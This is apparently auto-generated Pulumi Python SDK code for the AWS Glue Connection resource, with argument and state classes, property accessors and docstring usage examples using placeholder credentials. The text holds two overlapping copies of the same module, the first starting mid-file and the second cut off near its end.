connection. :param pulumi.Input[str] connection_type: The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. :param pulumi.Input[str] description: Description of the connection. :param pulumi.Input[Sequence[pulumi.Input[str]]] match_criterias: A list of criteria that can be used in selecting this connection. :param pulumi.Input[str] name: The name of the connection. :param pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']] physical_connection_requirements: A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ ... @overload def __init__(__self__, resource_name: str, args: Optional[ConnectionArgs] = None, opts: Optional[pulumi.ResourceOptions] = None): """ Provides a Glue Connection resource. ## Example Usage ### Non-VPC Connection ```python import pulumi import pulumi_aws as aws example = aws.glue.Connection("example", connection_properties={ "JDBC_CONNECTION_URL": "jdbc:mysql://example.com/exampledatabase", "PASSWORD": "examplepassword", "USERNAME": "exampleusername", }) ``` ### VPC Connection For more information, see the [AWS Documentation](https://docs.aws.amazon.com/glue/latest/dg/populate-add-connection.html#connection-JDBC-VPC). ```python import pulumi import pulumi_aws as aws example = aws.glue.Connection("example", connection_properties={ "JDBC_CONNECTION_URL": f"jdbc:mysql://{aws_rds_cluster["example"]["endpoint"]}/exampledatabase", "PASSWORD": "examplepassword", "USERNAME": "exampleusername", }, physical_connection_requirements=aws.glue.ConnectionPhysicalConnectionRequirementsArgs( availability_zone=aws_subnet["example"]["availability_zone"], security_group_id_lists=[aws_security_group["example"]["id"]], subnet_id=aws_subnet["example"]["id"], )) ``` ## Import Glue Connections can be imported using the `CATALOG-ID` (AWS account ID if not custom) and `NAME`, e.g. ```sh $ pulumi import aws:glue/connection:Connection MyConnection 123456789012:MyConnection ``` :param str resource_name: The name of the resource. :param ConnectionArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(ConnectionArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, catalog_id: Optional[pulumi.Input[str]] = None, connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, connection_type: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, physical_connection_requirements: Optional[pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = ConnectionArgs.__new__(ConnectionArgs) __props__.__dict__["catalog_id"] = catalog_id __props__.__dict__["connection_properties"] = connection_properties __props__.__dict__["connection_type"] = connection_type __props__.__dict__["description"] = description __props__.__dict__["match_criterias"] = match_criterias __props__.__dict__["name"] = name __props__.__dict__["physical_connection_requirements"] = physical_connection_requirements __props__.__dict__["tags"] = tags __props__.__dict__["tags_all"] = tags_all __props__.__dict__["arn"] = None super(Connection, __self__).__init__( 'aws:glue/connection:Connection', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, arn: Optional[pulumi.Input[str]] = None, catalog_id: Optional[pulumi.Input[str]] = None, connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, connection_type: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, physical_connection_requirements: Optional[pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'Connection': """ Get an existing Connection resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] arn: The ARN of the Glue Connection. :param pulumi.Input[str] catalog_id: The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] connection_properties: A map of key-value pairs used as parameters for this connection. :param pulumi.Input[str] connection_type: The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. :param pulumi.Input[str] description: Description of the connection. :param pulumi.Input[Sequence[pulumi.Input[str]]] match_criterias: A list of criteria that can be used in selecting this connection. :param pulumi.Input[str] name: The name of the connection. :param pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']] physical_connection_requirements: A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _ConnectionState.__new__(_ConnectionState) __props__.__dict__["arn"] = arn __props__.__dict__["catalog_id"] = catalog_id __props__.__dict__["connection_properties"] = connection_properties __props__.__dict__["connection_type"] = connection_type __props__.__dict__["description"] = description __props__.__dict__["match_criterias"] = match_criterias __props__.__dict__["name"] = name __props__.__dict__["physical_connection_requirements"] = physical_connection_requirements __props__.__dict__["tags"] = tags __props__.__dict__["tags_all"] = tags_all return Connection(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def arn(self) -> pulumi.Output[str]: """ The ARN of the Glue Connection. """ return pulumi.get(self, "arn") @property @pulumi.getter(name="catalogId") def catalog_id(self) -> pulumi.Output[str]: """ The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. """ return pulumi.get(self, "catalog_id") @property @pulumi.getter(name="connectionProperties") def connection_properties(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ A map of key-value pairs used as parameters for this connection. """ return pulumi.get(self, "connection_properties") @property @pulumi.getter(name="connectionType") def connection_type(self) -> pulumi.Output[Optional[str]]: """ The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. """ return pulumi.get(self, "connection_type") @property @pulumi.getter def description(self) -> pulumi.Output[Optional[str]]: """ Description of the connection. """ return pulumi.get(self, "description") @property @pulumi.getter(name="matchCriterias") def match_criterias(self) -> pulumi.Output[Optional[Sequence[str]]]: """ A list of criteria that can be used in selecting this connection. """ return pulumi.get(self, "match_criterias") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the connection. """ return pulumi.get(self, "name") @property @pulumi.getter(name="physicalConnectionRequirements") def physical_connection_requirements(self) -> pulumi.Output[Optional['outputs.ConnectionPhysicalConnectionRequirements']]: """ A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. """ return pulumi.get(self, "physical_connection_requirements") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. """ return pulumi.get(self, "tags") @property @pulumi.getter(name="tagsAll") def tags_all(self) -> pulumi.Output[Mapping[str, str]]: """ A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ return pulumi.get(self, "tags_all")
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities from . import outputs from ._inputs import * __all__ = ['ConnectionArgs', 'Connection'] @pulumi.input_type class ConnectionArgs: def __init__(__self__, *, catalog_id: Optional[pulumi.Input[str]] = None, connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, connection_type: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, physical_connection_requirements: Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None): """ The set of arguments for constructing a Connection resource. :param pulumi.Input[str] catalog_id: The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] connection_properties: A map of key-value pairs used as parameters for this connection. :param pulumi.Input[str] connection_type: The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. :param pulumi.Input[str] description: Description of the connection. :param pulumi.Input[Sequence[pulumi.Input[str]]] match_criterias: A list of criteria that can be used in selecting this connection. :param pulumi.Input[str] name: The name of the connection. :param pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs'] physical_connection_requirements: A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ if catalog_id is not None: pulumi.set(__self__, "catalog_id", catalog_id) if connection_properties is not None: pulumi.set(__self__, "connection_properties", connection_properties) if connection_type is not None: pulumi.set(__self__, "connection_type", connection_type) if description is not None: pulumi.set(__self__, "description", description) if match_criterias is not None: pulumi.set(__self__, "match_criterias", match_criterias) if name is not None: pulumi.set(__self__, "name", name) if physical_connection_requirements is not None: pulumi.set(__self__, "physical_connection_requirements", physical_connection_requirements) if tags is not None: pulumi.set(__self__, "tags", tags) if tags_all is not None: pulumi.set(__self__, "tags_all", tags_all) @property @pulumi.getter(name="catalogId") def catalog_id(self) -> Optional[pulumi.Input[str]]: """ The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. """ return pulumi.get(self, "catalog_id") @catalog_id.setter def catalog_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "catalog_id", value) @property @pulumi.getter(name="connectionProperties") def connection_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ A map of key-value pairs used as parameters for this connection. """ return pulumi.get(self, "connection_properties") @connection_properties.setter def connection_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "connection_properties", value) @property @pulumi.getter(name="connectionType") def connection_type(self) -> Optional[pulumi.Input[str]]: """ The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. """ return pulumi.get(self, "connection_type") @connection_type.setter def connection_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "connection_type", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ Description of the connection. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="matchCriterias") def match_criterias(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ A list of criteria that can be used in selecting this connection. """ return pulumi.get(self, "match_criterias") @match_criterias.setter def match_criterias(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "match_criterias", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the connection. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="physicalConnectionRequirements") def physical_connection_requirements(self) -> Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']]: """ A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. """ return pulumi.get(self, "physical_connection_requirements") @physical_connection_requirements.setter def physical_connection_requirements(self, value: Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']]): pulumi.set(self, "physical_connection_requirements", value) @property @pulumi.getter def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. """ return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags", value) @property @pulumi.getter(name="tagsAll") def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ return pulumi.get(self, "tags_all") @tags_all.setter def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags_all", value) @pulumi.input_type class _ConnectionState: def __init__(__self__, *, arn: Optional[pulumi.Input[str]] = None, catalog_id: Optional[pulumi.Input[str]] = None, connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, connection_type: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, physical_connection_requirements: Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None): """ Input properties used for looking up and filtering Connection resources. :param pulumi.Input[str] arn: The ARN of the Glue Connection. :param pulumi.Input[str] catalog_id: The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] connection_properties: A map of key-value pairs used as parameters for this connection. :param pulumi.Input[str] connection_type: The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. :param pulumi.Input[str] description: Description of the connection. :param pulumi.Input[Sequence[pulumi.Input[str]]] match_criterias: A list of criteria that can be used in selecting this connection. :param pulumi.Input[str] name: The name of the connection. :param pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs'] physical_connection_requirements: A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ if arn is not None: pulumi.set(__self__, "arn", arn) if catalog_id is not None: pulumi.set(__self__, "catalog_id", catalog_id) if connection_properties is not None: pulumi.set(__self__, "connection_properties", connection_properties) if connection_type is not None: pulumi.set(__self__, "connection_type", connection_type) if description is not None: pulumi.set(__self__, "description", description) if match_criterias is not None: pulumi.set(__self__, "match_criterias", match_criterias) if name is not None: pulumi.set(__self__, "name", name) if physical_connection_requirements is not None: pulumi.set(__self__, "physical_connection_requirements", physical_connection_requirements) if tags is not None: pulumi.set(__self__, "tags", tags) if tags_all is not None: pulumi.set(__self__, "tags_all", tags_all) @property @pulumi.getter def arn(self) -> Optional[pulumi.Input[str]]: """ The ARN of the Glue Connection. """ return pulumi.get(self, "arn") @arn.setter def arn(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "arn", value) @property @pulumi.getter(name="catalogId") def catalog_id(self) -> Optional[pulumi.Input[str]]: """ The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. """ return pulumi.get(self, "catalog_id") @catalog_id.setter def catalog_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "catalog_id", value) @property @pulumi.getter(name="connectionProperties") def connection_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ A map of key-value pairs used as parameters for this connection. """ return pulumi.get(self, "connection_properties") @connection_properties.setter def connection_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "connection_properties", value) @property @pulumi.getter(name="connectionType") def connection_type(self) -> Optional[pulumi.Input[str]]: """ The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. """ return pulumi.get(self, "connection_type") @connection_type.setter def connection_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "connection_type", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ Description of the connection. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="matchCriterias") def match_criterias(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ A list of criteria that can be used in selecting this connection. """ return pulumi.get(self, "match_criterias") @match_criterias.setter def match_criterias(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "match_criterias", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the connection. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="physicalConnectionRequirements") def physical_connection_requirements(self) -> Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']]: """ A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. """ return pulumi.get(self, "physical_connection_requirements") @physical_connection_requirements.setter def physical_connection_requirements(self, value: Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']]): pulumi.set(self, "physical_connection_requirements", value) @property @pulumi.getter def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. """ return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags", value) @property @pulumi.getter(name="tagsAll") def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ return pulumi.get(self, "tags_all") @tags_all.setter def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags_all", value) class Connection(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, catalog_id: Optional[pulumi.Input[str]] = None, connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, connection_type: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, physical_connection_requirements: Optional[pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, __props__=None): """ Provides a Glue Connection resource. ## Example Usage ### Non-VPC Connection ```python import pulumi import pulumi_aws as aws example = aws.glue.Connection("example", connection_properties={ "JDBC_CONNECTION_URL": "jdbc:mysql://example.com/exampledatabase", "PASSWORD": "examplepassword", "USERNAME": "exampleusername", }) ``` ### VPC Connection For more information, see the [AWS Documentation](https://docs.aws.amazon.com/glue/latest/dg/populate-add-connection.html#connection-JDBC-VPC). ```python import pulumi import pulumi_aws as aws example = aws.glue.Connection("example", connection_properties={ "JDBC_CONNECTION_URL": f"jdbc:mysql://{aws_rds_cluster['example']['endpoint']}/exampledatabase", "PASSWORD": "examplepassword", "USERNAME": "exampleusername", }, physical_connection_requirements=aws.glue.ConnectionPhysicalConnectionRequirementsArgs( availability_zone=aws_subnet["example"]["availability_zone"], security_group_id_lists=[aws_security_group["example"]["id"]], subnet_id=aws_subnet["example"]["id"], )) ``` ## Import Glue Connections can be imported using the `CATALOG-ID` (AWS account ID if not custom) and `NAME`, e.g. ```sh $ pulumi import aws:glue/connection:Connection MyConnection 123456789012:MyConnection ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] catalog_id: The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] connection_properties: A map of key-value pairs used as parameters for this connection. :param pulumi.Input[str] connection_type: The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. :param pulumi.Input[str] description: Description of the connection. :param pulumi.Input[Sequence[pulumi.Input[str]]] match_criterias: A list of criteria that can be used in selecting this connection. :param pulumi.Input[str] name: The name of the connection. :param pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']] physical_connection_requirements: A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ ... @overload def __init__(__self__, resource_name: str, args: Optional[ConnectionArgs] = None, opts: Optional[pulumi.ResourceOptions] = None): """ Provides a Glue Connection resource. ## Example Usage ### Non-VPC Connection ```python import pulumi import pulumi_aws as aws example = aws.glue.Connection("example", connection_properties={ "JDBC_CONNECTION_URL": "jdbc:mysql://example.com/exampledatabase", "PASSWORD": "examplepassword", "USERNAME": "exampleusername", }) ``` ### VPC Connection For more information, see the [AWS Documentation](https://docs.aws.amazon.com/glue/latest/dg/populate-add-connection.html#connection-JDBC-VPC). ```python import pulumi import pulumi_aws as aws example = aws.glue.Connection("example", connection_properties={ "JDBC_CONNECTION_URL": f"jdbc:mysql://{aws_rds_cluster['example']['endpoint']}/exampledatabase", "PASSWORD": "examplepassword", "USERNAME": "exampleusername", }, physical_connection_requirements=aws.glue.ConnectionPhysicalConnectionRequirementsArgs( availability_zone=aws_subnet["example"]["availability_zone"], security_group_id_lists=[aws_security_group["example"]["id"]], subnet_id=aws_subnet["example"]["id"], )) ``` ## Import Glue Connections can be imported using the `CATALOG-ID` (AWS account ID if not custom) and `NAME`, e.g. ```sh $ pulumi import aws:glue/connection:Connection MyConnection 123456789012:MyConnection ``` :param str resource_name: The name of the resource. :param ConnectionArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(ConnectionArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, catalog_id: Optional[pulumi.Input[str]] = None, connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, connection_type: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, physical_connection_requirements: Optional[pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = ConnectionArgs.__new__(ConnectionArgs) __props__.__dict__["catalog_id"] = catalog_id __props__.__dict__["connection_properties"] = connection_properties __props__.__dict__["connection_type"] = connection_type __props__.__dict__["description"] = description __props__.__dict__["match_criterias"] = match_criterias __props__.__dict__["name"] = name __props__.__dict__["physical_connection_requirements"] = physical_connection_requirements __props__.__dict__["tags"] = tags __props__.__dict__["tags_all"] = tags_all __props__.__dict__["arn"] = None super(Connection, __self__).__init__( 'aws:glue/connection:Connection', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, arn: Optional[pulumi.Input[str]] = None, catalog_id: Optional[pulumi.Input[str]] = None, connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, connection_type: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, physical_connection_requirements: Optional[pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'Connection': """ Get an existing Connection resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] arn: The ARN of the Glue Connection. :param pulumi.Input[str] catalog_id: The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] connection_properties: A map of key-value pairs used as parameters for this connection. :param pulumi.Input[str] connection_type: The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. :param pulumi.Input[str] description: Description of the connection. :param pulumi.Input[Sequence[pulumi.Input[str]]] match_criterias: A list of criteria that can be used in selecting this connection. :param pulumi.Input[str] name: The name of the connection. :param pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']] physical_connection_requirements: A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _ConnectionState.__new__(_ConnectionState) __props__.__dict__["arn"] = arn __props__.__dict__["catalog_id"] = catalog_id __props__.__dict__["connection_properties"] = connection_properties __props__.__dict__["connection_type"] = connection_type __props__.__dict__["description"] = description __props__.__dict__["match_criterias"] = match_criterias __props__.__dict__["name"] = name __props__.__dict__["physical_connection_requirements"] = physical_connection_requirements __props__.__dict__["tags"] = tags __props__.__dict__["tags_all"] = tags_all return Connection(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def arn(self) -> pulumi.Output[str]: """ The ARN of the Glue Connection. """ return pulumi.get(self, "arn") @property @pulumi.getter(name="catalogId") def catalog_id(self) -> pulumi.Output[str]: """ The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. """ return pulumi.get(self, "catalog_id") @property @pulumi.getter(name="connectionProperties") def connection_properties(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ A map of key-value pairs used as parameters for this connection. """ return pulumi.get(self, "connection_properties") @property 